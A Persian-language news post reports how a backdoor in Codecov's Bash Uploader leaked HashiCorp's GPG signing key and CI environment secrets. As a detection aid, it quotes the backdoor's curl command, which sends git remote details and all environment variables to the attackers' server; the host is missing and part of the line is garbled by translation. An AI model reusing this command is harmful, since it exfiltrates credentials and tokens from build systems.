ProHoster > وبلاگ > اخبار اینترنتی > معرفی کدهای مخرب به اسکریپت Codecov منجر به به خطر افتادن کلید PGP HashiCorp شد.

معرفی کدهای مخرب به اسکریپت Codecov منجر به به خطر افتادن کلید PGP HashiCorp شد.

HashiCorp که به دلیل توسعه ابزارهای متن باز Vagrant، Packer، Nomad و Terraform شناخته می شود، از نشت کلید خصوصی GPG استفاده شده برای ایجاد امضاهای دیجیتالی که انتشار را تأیید می کند، خبر داد. مهاجمانی که به کلید GPG دسترسی پیدا کرده‌اند، می‌توانند به طور بالقوه تغییرات پنهانی در محصولات HashiCorp با تأیید آنها با امضای دیجیتال صحیح ایجاد کنند. در همان زمان، این شرکت اعلام کرد که در جریان حسابرسی، هیچ اثری از تلاش برای انجام چنین اصلاحاتی شناسایی نشد.

در حال حاضر کلید GPG به خطر افتاده باطل شده و کلید جدیدی به جای آن معرفی شده است. این مشکل فقط تأیید با استفاده از فایل‌های SHA256SUM و SHA256SUM.sig را تحت تأثیر قرار داد و تأثیری بر تولید امضاهای دیجیتال برای بسته‌های DEB و RPM لینوکس ارائه‌شده از طریق releases.hashicorp.com و همچنین مکانیسم‌های تأیید انتشار برای macOS و Windows (AuthentiCode) نداشت. .

این نشت به دلیل استفاده از اسکریپت Codecov Bash Uploader (codecov-bash) در زیرساخت رخ داد که برای دانلود گزارش‌های پوشش از سیستم‌های یکپارچه‌سازی مداوم طراحی شده است. در طول حمله به شرکت Codecov، یک درب پشتی در اسکریپت مشخص شده پنهان شده بود که از طریق آن رمز عبور و کلیدهای رمزگذاری به سرور مهاجمان ارسال می شد.

برای هک، مهاجمان از یک خطا در فرآیند ایجاد تصویر Codecov Docker استفاده کردند، که امکان استخراج داده‌های دسترسی به GCS (Google Cloud Storage) را فراهم کرد، که برای ایجاد تغییرات در اسکریپت Bash Uploader توزیع شده از codecov ضروری است. وب سایت io. این تغییرات در 31 ژانویه ایجاد شد، به مدت دو ماه شناسایی نشد و به مهاجمان اجازه داد اطلاعات ذخیره شده در محیط های سیستم یکپارچه سازی مداوم مشتری را استخراج کنند. با استفاده از کد مخرب اضافه شده، مهاجمان می‌توانند اطلاعات مربوط به مخزن Git آزمایش شده و همه متغیرهای محیطی، از جمله توکن‌ها، کلیدهای رمزگذاری و رمزهای عبور را که به سیستم‌های ادغام پیوسته برای سازماندهی دسترسی به کد برنامه، مخازن و سرویس‌هایی مانند خدمات وب آمازون و GitHub منتقل می‌شوند، به دست آورند. .

علاوه بر تماس مستقیم، از اسکریپت Codecov Bash Uploader به عنوان بخشی از آپلودگرهای دیگر مانند Codecov-action (Github)، Codecov-circleci-orb و Codecov-bitrise-step استفاده شد که کاربران آن نیز تحت تأثیر این مشکل قرار دارند. به همه کاربران codecov-bash و محصولات مرتبط توصیه می‌شود زیرساخت‌های خود را بررسی کرده و رمز عبور و کلیدهای رمزگذاری را تغییر دهند. با وجود خط curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// می‌توانید وجود یک درپشتی را در یک اسکریپت بررسی کنید. /upload/v2 || درست است، واقعی

منبع: opennet.ru

اضافه کردن نظر